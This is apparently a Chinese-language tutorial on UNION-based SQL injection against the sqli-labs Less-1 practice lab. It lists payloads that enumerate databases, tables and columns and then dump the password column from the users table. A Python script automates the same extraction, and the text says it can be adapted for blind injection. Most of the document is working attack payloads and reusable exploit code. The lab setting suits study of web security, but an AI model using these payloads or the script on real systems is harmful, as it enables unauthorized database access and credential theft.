字符型與數字型所使用的payload有所不同,但是大同小異,注意總結
一、獲取字段數和可插入位置:
id=1' order by 3--+
id=-1' union select 1,2,3 --+
二、獲取當前數據庫、當前用戶以及所有數據庫名
#獲取當前數據庫
id=-1' union select 1,2,database() --+
#獲取當前用戶
id=-1' union select 1,2,user() --+
#獲取所有數據庫名
id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+
三、獲取表名
id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
四、獲取字段名和數據
#獲取字段名
id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
#獲取字段數據
id=-1' union select 1,2,group_concat(password) from security.users--+
聯合注入比較簡單實現,可根據規則寫腳本自動獲取數據,本人也寫了一份,大家做做參考,代碼:
'''Get data'''
def get_data(target_url,payload):
html_content = requests.get(target_url + payload).text
result = re.findall(r"Password:(.+?)</",html_content)
if len(result) > 0 :
return result
'''Get databases name'''
def get_databse_name(target_url):
all_databse_payload = "?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+"
current_database_payload = "?id=-1' union select 1,2,database() --+"
database_name_list = get_data(target_url,all_databse_payload)
current_database = get_data(target_url,current_database_payload)
print('Current database:')
for item in current_database:
print(item + ' ')
print('Exist database name:')
for item in database_name_list:
print(item)
print('*************************************************************************')
print('\n')
'''Get tables name'''
def get_table_name(target_url):
database_name = input('Input a database name: ')
print("Tables name:")
payload = "?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='%s' --+"%database_name
table_name_list = get_data(target_url,payload)
for item in table_name_list:
print(item)
print('*************************************************************************')
print('\n')
def get_column_name(target_url):
table_name = input('Please input a table name:')
payload = "?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='%s' --+"%table_name
column_name_list = get_data(target_url,payload)
print('Columns name list:')
for item in column_name_list:
print(item)
print('*************************************************************************')
print('\n')
def get_column_data(target_url):
database_name = input('Input a database name: ')
table_name = input('Please input a table name:')
column_name = input('Please input a column name:')
payload = "?id=-1' union select 1,2,group_concat(%s) from %s.%s --+"%(column_name,database_name,table_name)
column_data = get_data(target_url,payload)
for item in column_data:
print(item)
print('*************************************************************************')
print('\n')
if __name__ == '__main__':
target_url = 'http://127.0.0.1/sqli-labs-master/Less-1/'
begin_time = datetime.datetime.now()
print('+----------------------------------------Begin----------------------------------------+')
get_databse_name(target_url)
get_table_name(target_url)
get_column_data(target_url)
end_time = datetime.datetime.now()
run_time = (end_time - begin_time).seconds
print('+-----------------------------------------End-----------------------------------------+')
print('All mission completed!Cost %s seconds'%run_time)
運行效果:
當遇到盲注類型時可根據特徵進行改改可以繼續使用。